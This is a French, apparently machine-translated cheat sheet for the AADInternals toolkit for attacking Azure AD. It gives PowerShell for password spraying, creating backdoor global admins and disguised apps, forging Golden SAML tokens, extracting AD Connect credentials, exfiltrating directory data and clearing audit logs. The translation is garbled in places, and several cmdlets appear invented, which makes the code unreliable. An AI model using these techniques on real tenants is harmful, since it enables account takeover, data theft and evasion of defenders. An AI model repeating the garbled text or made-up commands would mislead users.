AADInternals Azure AD Exploitation Boîte à outils Feuille de chaleur

Copier toutes les commandes Générer PDF

Aperçu général

AADInternals est une puissance Module Shell développé par le Dr Nestori Syynimaa pour administrer et exploiter Azure Active Directory et Office 365. Il fournit des capacités globales pour les activités de reconnaissance, d'exploitation et de post-exploitation de Azure AD.

C'est pas vrai. Attention : Cet outil est destiné uniquement aux tests de pénétration et aux évaluations de sécurité autorisés. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser dans tout environnement.

Installation

Installation de la galerie PowerShell

# Install from PowerShell Gallery
Install-Module AADInternals

# Install specific version
Install-Module AADInternals -RequiredVersion 0.9.3

# Install for current user only
Install-Module AADInternals -Scope CurrentUser

# Update existing installation
Update-Module AADInternals

Installation manuelle

# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/Gerenios/AADInternals/archive/master.zip" -OutFile "AADInternals.zip"
Expand-Archive -Path "AADInternals.zip" -DestinationPath "C:\Tools\"

# Import module
Import-Module C:\Tools\AADInternals-master\AADInternals.psd1

# Install dependencies
Install-Module -Name MSAL.PS
Install-Module -Name Microsoft.Graph
```_

### Installation Docker
```bash
# Run AADInternals in Docker with PowerShell
docker run -it mcr.microsoft.com/powershell:latest
pwsh -c "Install-Module AADInternals -Force; Import-Module AADInternals"
```_

## Utilisation de base

### Importation et configuration du module
```powershell
# Import AADInternals module
Import-Module AADInternals

# Get module information
Get-Module AADInternals

# List available commands
Get-Command -Module AADInternals

# Get help for specific command
Get-Help Get-AADIntAccessTokenForAADGraph -Full

Méthodes d'authentification

# Interactive authentication
$cred = Get-Credential
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $cred

# Device code authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -UseDeviceCode

# Certificate authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $cert -ClientId $clientId -TenantId $tenantId

# Refresh token authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken

Référence de commande

Commandes d'authentification

Command	Description
`Get-AADIntAccessTokenForAADGraph`	Get access token for AAD Graph
`Get-AADIntAccessTokenForMSGraph`	Get access token for MS Graph
`Get-AADIntAccessTokenForEXO`	Get access token for Exchange Online
`Get-AADIntAccessTokenForSPO`	Get access token for SharePoint Online
`Get-AADIntAccessTokenForTeams`	Get access token for Teams

Commandements de reconnaissance

Command	Description
`Get-AADIntTenantID`	Get tenant ID from domain
`Get-AADIntTenantDomains`	Get tenant domains
`Get-AADIntCompanyInformation`	Get company information
`Get-AADIntUsers`	Get Azure AD users
`Get-AADIntGroups`	Get Azure AD groups
`Get-AADIntApplications`	Get applications

Commandements d'exploitation

Command	Description
`New-AADIntBackdoor`	Create backdoor user
`Set-AADIntUserPassword`	Set user password
`Add-AADIntUserToGroup`	Add user to group
`Grant-AADIntAppRoleToServicePrincipal`	Grant app permissions
`New-AADIntGlobalAdmin`	Create global admin

Reconnaissance et collecte d'information

Découverte de locataires

# Get tenant ID from domain
$tenantId = Get-AADIntTenantID -Domain "company.com"

# Get tenant domains
$domains = Get-AADIntTenantDomains -Domain "company.com"

# Get company information
$companyInfo = Get-AADIntCompanyInformation -AccessToken $accessToken

# Get tenant details
$tenantDetails = Get-AADIntTenantDetails -AccessToken $accessToken

Énumération des utilisateurs

# Get all users
$users = Get-AADIntUsers -AccessToken $accessToken

# Get specific user
$user = Get-AADIntUser -AccessToken $accessToken -UserPrincipalName "user@company.com"

# Get user's group memberships
$groups = Get-AADIntUserGroups -AccessToken $accessToken -UserPrincipalName "user@company.com"

# Get user's roles
$roles = Get-AADIntUserRoles -AccessToken $accessToken -UserPrincipalName "user@company.com"

# Search users by attribute
$users = Get-AADIntUsers -AccessToken $accessToken -SearchString "admin"

Énumération des groupes

# Get all groups
$groups = Get-AADIntGroups -AccessToken $accessToken

# Get group members
$members = Get-AADIntGroupMembers -AccessToken $accessToken -GroupId $groupId

# Get privileged groups
$adminGroups = Get-AADIntGroups -AccessToken $accessToken|Where-Object \\\\{$_.displayName -like "*admin*"\\\\}

# Get group owners
$owners = Get-AADIntGroupOwners -AccessToken $accessToken -GroupId $groupId

Nombre de demandes et de services

# Get all applications
$apps = Get-AADIntApplications -AccessToken $accessToken

# Get service principals
$servicePrincipals = Get-AADIntServicePrincipals -AccessToken $accessToken

# Get application permissions
$permissions = Get-AADIntApplicationPermissions -AccessToken $accessToken -ApplicationId $appId

# Get OAuth permissions
$oauthPerms = Get-AADIntOAuthPermissions -AccessToken $accessToken

Techniques d'exploitation

Attaques de mot de passe

# Password spray attack
$users = Get-AADIntUsers -AccessToken $accessToken
$passwords = @("Password123", "Summer2024", "Company123")

foreach ($password in $passwords) \\\\{
    foreach ($user in $users) \\\\{
        try \\\\{
            $token = Get-AADIntAccessTokenForAADGraph -UserPrincipalName $user.userPrincipalName -Password $password
            Write-Host "Success: $($user.userPrincipalName):$password"
        \\\\}
        catch \\\\{
            # Password failed
        \\\\}
    \\\\}
\\\\}

# Set user password (requires privileges)
Set-AADIntUserPassword -AccessToken $accessToken -UserPrincipalName "user@company.com" -Password "NewPassword123"

Escalade des privilèges

# Create global administrator
New-AADIntGlobalAdmin -AccessToken $accessToken -UserPrincipalName "backdoor@company.com" -Password "BackdoorPass123"

# Add user to privileged group
Add-AADIntUserToGroup -AccessToken $accessToken -UserPrincipalName "user@company.com" -GroupId $adminGroupId

# Grant application permissions
Grant-AADIntAppRoleToServicePrincipal -AccessToken $accessToken -ServicePrincipalId $spId -AppRoleId $roleId -ResourceId $resourceId

# Create application with high privileges
$app = New-AADIntApplication -AccessToken $accessToken -DisplayName "BackdoorApp" -RequiredResourceAccess $permissions

Création de la porte arrière

# Create backdoor user
$backdoorUser = New-AADIntBackdoor -AccessToken $accessToken -UserPrincipalName "service-account@company.com" -Password "ComplexPassword123"

# Create backdoor application
$backdoorApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "LegitimateApp" -RequiredResourceAccess $highPrivileges

# Create service principal for backdoor
$backdoorSP = New-AADIntServicePrincipal -AccessToken $accessToken -ApplicationId $backdoorApp.appId

# Grant backdoor permissions
Grant-AADIntAppRoleToServicePrincipal -AccessToken $accessToken -ServicePrincipalId $backdoorSP.id -AppRoleId $adminRoleId

Manipulation des jetons

# Get access token for different resources
$graphToken = Get-AADIntAccessTokenForMSGraph -AccessToken $accessToken
$exoToken = Get-AADIntAccessTokenForEXO -AccessToken $accessToken
$spoToken = Get-AADIntAccessTokenForSPO -AccessToken $accessToken

# Parse JWT token
$tokenInfo = Read-AADIntAccessToken -AccessToken $accessToken

# Get refresh token
$refreshToken = Get-AADIntRefreshToken -AccessToken $accessToken

# Use refresh token for persistence
$newToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken

Attaques avancées

Le SAML doré Attaque

# Export ADFS certificate (requires ADFS access)
$cert = Export-AADIntADFSCertificate

# Create Golden SAML token
$samlToken = New-AADIntSAMLToken -Certificate $cert -UserPrincipalName "admin@company.com" -Issuer "http://company.com/adfs/services/trust"

# Use Golden SAML to get access token
$accessToken = Get-AADIntAccessTokenForAADGraph -SAMLToken $samlToken

Azure AD Connect Attaques

# Get Azure AD Connect information
$adConnectInfo = Get-AADIntAzureADConnectInfo -AccessToken $accessToken

# Extract Azure AD Connect credentials (requires local admin on AAD Connect server)
$adConnectCreds = Get-AADIntAzureADConnectCredentials

# Use extracted credentials
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $adConnectCreds

Pass-the-Hash Attaques

# Use NTLM hash for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -UserPrincipalName "user@company.com" -Hash $ntlmHash

# Use Kerberos ticket
$accessToken = Get-AADIntAccessTokenForAADGraph -KerberosTicket $ticket

Enregistrement de l'appareil Attaques

# Register malicious device
$device = New-AADIntDevice -AccessToken $accessToken -DisplayName "DESKTOP-MALICIOUS" -DeviceId $deviceId

# Get device certificate
$deviceCert = Get-AADIntDeviceCertificate -AccessToken $accessToken -DeviceId $deviceId

# Use device certificate for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $deviceCert

Techniques de persistance

Persistance fondée sur l'application

# Create persistent application
$persistentApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "Microsoft Graph PowerShell" -RequiredResourceAccess $permissions

# Add application secret
$secret = New-AADIntApplicationSecret -AccessToken $accessToken -ApplicationId $persistentApp.appId

# Use application for persistence
$accessToken = Get-AADIntAccessTokenForAADGraph -ClientId $persistentApp.appId -ClientSecret $secret.value -TenantId $tenantId

Persistance des utilisateurs

# Create service account
$serviceAccount = New-AADIntUser -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -DisplayName "Backup Service Account" -Password "ServicePass123"

# Assign privileged roles
Add-AADIntUserToRole -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -RoleName "Global Administrator"

# Disable account auditing
Set-AADIntUser -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -AuditingEnabled $false

Persistance fondée sur un certificat

# Generate certificate for authentication
$cert = New-SelfSignedCertificate -Subject "CN=BackdoorCert" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable

# Add certificate to application
Add-AADIntApplicationCertificate -AccessToken $accessToken -ApplicationId $appId -Certificate $cert

# Use certificate for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $cert -ClientId $appId -TenantId $tenantId

Exfiltration des données

Extraction de données utilisateur

# Export all users with detailed information
$users = Get-AADIntUsers -AccessToken $accessToken
$users|Export-Csv -Path "users.csv" -NoTypeInformation

# Export user photos
foreach ($user in $users) \\\\{
    $photo = Get-AADIntUserPhoto -AccessToken $accessToken -UserPrincipalName $user.userPrincipalName
    if ($photo) \\\\{
        [System.IO.File]::WriteAllBytes("photos\$($user.userPrincipalName).jpg", $photo)
    \\\\}
\\\\}

# Export user's OneDrive files
$files = Get-AADIntUserOneDriveFiles -AccessToken $accessToken -UserPrincipalName "user@company.com"

Information sur le groupe et le rôle

# Export group memberships
$groups = Get-AADIntGroups -AccessToken $accessToken
foreach ($group in $groups) \\\\{
    $members = Get-AADIntGroupMembers -AccessToken $accessToken -GroupId $group.id
    $group|Add-Member -NotePropertyName "Members" -NotePropertyValue $members
\\\\}
$groups|ConvertTo-Json -Depth 3|Out-File "groups.json"

# Export role assignments
$roles = Get-AADIntDirectoryRoles -AccessToken $accessToken
foreach ($role in $roles) \\\\{
    $members = Get-AADIntDirectoryRoleMembers -AccessToken $accessToken -RoleId $role.id
    $role|Add-Member -NotePropertyName "Members" -NotePropertyValue $members
\\\\}
$roles|ConvertTo-Json -Depth 3|Out-File "roles.json"

Données sur l'application et l'autorisation

# Export applications with permissions
$apps = Get-AADIntApplications -AccessToken $accessToken
foreach ($app in $apps) \\\\{
    $permissions = Get-AADIntApplicationPermissions -AccessToken $accessToken -ApplicationId $app.id
    $app|Add-Member -NotePropertyName "Permissions" -NotePropertyValue $permissions
\\\\}
$apps|ConvertTo-Json -Depth 3|Out-File "applications.json"

# Export OAuth consent grants
$consents = Get-AADIntOAuthPermissions -AccessToken $accessToken
$consents|Export-Csv -Path "oauth_consents.csv" -NoTypeInformation

Techniques d'évacuation

Opérations de vol

# Use legitimate application names
$stealthApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "Microsoft Office 365" -RequiredResourceAccess $permissions

# Mimic legitimate service accounts
$stealthUser = New-AADIntUser -AccessToken $accessToken -UserPrincipalName "o365sync@company.com" -DisplayName "Office 365 Sync Service"

# Use existing application IDs
$accessToken = Get-AADIntAccessTokenForAADGraph -ClientId "1b730954-1685-4b74-9bfd-dac224a7b894" -ClientSecret $secret  # Graph Explorer

Limites de vitesse et throttling

# Implement delays between requests
function Invoke-AADIntWithDelay \\\\{
    param($Command, $Delay = 1)

    & $Command
    Start-Sleep -Seconds $Delay
\\\\}

# Randomize request timing
$users = Get-AADIntUsers -AccessToken $accessToken
foreach ($user in $users) \\\\{
    $delay = Get-Random -Minimum 1 -Maximum 5
    Start-Sleep -Seconds $delay
    $groups = Get-AADIntUserGroups -AccessToken $accessToken -UserPrincipalName $user.userPrincipalName
\\\\}

Évasion du journal

# Use service principal instead of user account
$servicePrincipalToken = Get-AADIntAccessTokenForAADGraph -ClientId $clientId -ClientSecret $clientSecret -TenantId $tenantId

# Perform actions during business hours
$currentHour = (Get-Date).Hour
if ($currentHour -ge 9 -and $currentHour -le 17) \\\\{
    # Perform stealthy operations
\\\\}

# Use legitimate IP ranges
# Ensure operations are performed from expected geographic locations

Évasion défensive

Mesures antidétection

# Check for monitoring
$auditLogs = Get-AADIntAuditLogs -AccessToken $accessToken -Filter "activityDisplayName eq 'Add application'"

# Verify current permissions
$currentPerms = Get-AADIntCurrentUserPermissions -AccessToken $accessToken

# Check for Conditional Access policies
$caPolicies = Get-AADIntConditionalAccessPolicies -AccessToken $accessToken

# Monitor for security alerts
$securityAlerts = Get-AADIntSecurityAlerts -AccessToken $accessToken

Opérations de nettoyage

# Remove created applications
Remove-AADIntApplication -AccessToken $accessToken -ApplicationId $backdoorApp.appId

# Remove created users
Remove-AADIntUser -AccessToken $accessToken -UserPrincipalName "backdoor@company.com"

# Remove role assignments
Remove-AADIntUserFromRole -AccessToken $accessToken -UserPrincipalName "user@company.com" -RoleName "Global Administrator"

# Clear audit logs (if possible)
Clear-AADIntAuditLogs -AccessToken $accessToken -LogType "SignInLogs"

Dépannage

Questions d'authentification

# Debug authentication
$DebugPreference = "Continue"
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $cred

# Check token validity
$tokenInfo = Read-AADIntAccessToken -AccessToken $accessToken
$tokenInfo.exp  # Check expiration

# Refresh expired token
$newToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken

Questions relatives à la permission

# Check current permissions
$permissions = Get-AADIntCurrentUserPermissions -AccessToken $accessToken

# Test specific permission
Test-AADIntPermission -AccessToken $accessToken -Permission "User.Read.All"

# Get required permissions for command
Get-AADIntRequiredPermissions -Command "Get-AADIntUsers"

Limites de l'API

# Handle rate limiting
try \\\\{
    $users = Get-AADIntUsers -AccessToken $accessToken
\\\\}
catch \\\\{
    if ($_.Exception.Message -like "*throttled*") \\\\{
        Start-Sleep -Seconds 60
        $users = Get-AADIntUsers -AccessToken $accessToken
    \\\\}
\\\\}

# Use pagination for large datasets
$users = @()
$skip = 0
do \\\\{
    $batch = Get-AADIntUsers -AccessToken $accessToken -Top 100 -Skip $skip
    $users += $batch
    $skip += 100
\\\\} while ($batch.Count -eq 100)

Intégration avec d'autres outils

Intégration de BloodHound

# Export data for BloodHound
$users = Get-AADIntUsers -AccessToken $accessToken
$groups = Get-AADIntGroups -AccessToken $accessToken

# Convert to BloodHound format
$bloodhoundData = @\\\\{
    users = $users|ForEach-Object \\\\{
        @\\\\{
            ObjectIdentifier = $_.id
            Properties = @\\\\{
                name = $_.userPrincipalName
                displayname = $_.displayName
                enabled = $_.accountEnabled
            \\\\}
        \\\\}
    \\\\}
\\\\}

$bloodhoundData|ConvertTo-Json -Depth 3|Out-File "bloodhound_data.json"

Intégration PowerShell Empire

# Use AADInternals in Empire agent
$accessToken = Get-AADIntAccessTokenForAADGraph -UseDeviceCode
$users = Get-AADIntUsers -AccessToken $accessToken
$users|ConvertTo-Json|Out-File "C:\temp\aad_users.json"

Ressources

[AADInternals GitHub Repository] (LINK_5)
[Documentation AADInternals] (LINK_5)
[Blogue du Dr Nestori Syynimaa] (LINK_5)
[Azure AD Security Research] (LINK_5)
[Bureau 365 Sécurité] (LINK_5)

*Cette feuille de triche fournit une référence complète pour l'utilisation de AADInternals. Assurez-vous toujours d'avoir une autorisation appropriée avant d'effectuer des évaluations de sécurité Azure AD. *